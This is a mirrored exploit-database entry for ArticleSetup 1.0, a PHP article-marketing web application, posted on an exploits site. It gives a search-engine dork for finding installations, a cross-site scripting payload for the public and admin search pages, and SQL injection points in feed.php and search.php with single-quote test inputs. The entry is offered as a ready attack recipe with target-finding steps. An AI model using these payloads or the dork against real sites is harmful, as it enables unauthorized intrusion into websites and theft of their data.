[] NeoSense
E X P L O I T S
title author type platform port cve id

ArticleSetup - Multiple Vulnerabilities

Author: DevilScreaM
type: webapps
platform: php
port: 
date_added: 2013-09-29 
date_updated: 2013-09-29 
verified: 1 
codes: OSVDB-80786;OSVDB-80782;OSVDB-80781 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt29000/articlesetup.png 
application_url: 
#Exploit Title 		: ArticleSetup Multiple Vulnerabilities
#Author 		: DevilScreaM
#Date   		: 21/09/2013
#Category		: Web Applications
#Vendor 		: http://www.articlesetup.com/
#Version 		: 1.0

#Dork
intext:Powered By Article Marketing

#Vulnerability  	: Cross Site Scripting , SQL Injection
#Tested On 		: Windows 7, Ubuntu (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker


Cross Site Scripting

http://site-target/search.php?s=[XSS]


#XSS at Page Admin

http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script>


===================================================================================

SQL Injection Vulnerability

http://site-target/feed.php?cat=[SQL Injection]
http://site-target/search.php?s=[SQL Injection]

Example

http://site-target/feed.php?cat=100'
http://site-target/search.php?s=123'

====================================================================================
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.